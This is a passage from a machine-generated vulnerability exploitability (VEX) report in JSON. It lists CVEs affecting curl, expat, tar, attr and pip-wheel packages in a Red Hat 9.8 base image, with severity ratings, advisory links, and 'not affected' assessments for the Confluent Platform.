      "updated": "2026-07-23T07:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ]
    },
    {
      "id": "CVE-2026-4873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295,
        319
      ],
      "description": "A vulnerability exists where a connection requiring TLS incorrectly reuses an\nexisting unencrypted connection from the same connection pool. If an initial\ntransfer is made in clear-text (via IMAP, SMTP, or POP3), a subsequent request\nto that same host bypasses the TLS requirement and instead transmit data\nunencrypted.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4873"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4873"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5fgw-rv54-prjx"
        },
        {
          "url": "https://hackerone.com/reports/3621851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4873"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4873"
        }
      ],
      "published": "2026-05-13T13:01:55+00:00",
      "updated": "2026-06-17T10:57:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-50219",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_GetBuffer, XML_Parse, XML_ParseBuffer, XML_ParserFree, or XML_ParserReset from within handlers in cases of a policy violation. Thus, a use-after-free can occur,",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50219"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1246"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50219"
        }
      ],
      "published": "2026-06-04T06:16:25+00:00",
      "updated": "2026-07-22T20:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-53655",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        436
      ],
      "description": "node-tar is a full-featured Tar for Node.js. Prior to 7.5.16, tar (node-tar) applies a PAX extended header's size= record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name (L) or long-link (K) entry. Per POSIX pax, a PAX extended header (x) describes the next file entry, not the intermediary extension headers that may sit between the x header and the file it annotates. Because node-tar lets the PAX size override the byte length of an intervening L/K/x header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs / astral-tokio-tar). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another) This vulnerability is fixed in 7.5.16.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-53655"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-53655"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53655"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-53655"
        }
      ],
      "published": "2026-06-22T16:16:38+00:00",
      "updated": "2026-06-26T20:03:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54371",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        59
      ],
      "description": "attr before version 2.6.0 contains a symlink traversal vulnerability in the getfattr and setfattr utilities that allows local attackers to escalate privileges by replacing a pathname component with a symbolic link during directory hierarchy traversal. Attackers who control a pathname component can redirect getfattr and setfattr operations to arbitrary files by substituting a symlink, leading to local privilege escalation when getfattr or setfattr is invoked by a privileged process over an attacker-controlled path.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34889"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56133"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54371"
        },
        {
          "url": "https://bugzilla.redhat.com/2490283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490283"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=49f79e947270f06940b9100fa638f85dddc4aa7f"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=c440855d6b33446edf4b5eb1a2d892281f15a99b"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56133.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54371.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56133.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54371"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54371.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54371"
        },
        {
          "url": "https://www.vulncheck.com/advisories/attr-symlink-traversal-privilege-escalation-via-getfattr-setfattr"
        }
      ],
      "published": "2026-06-29T14:16:57+00:00",
      "updated": "2026-08-19T12:18:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.1-3.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.1-3.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
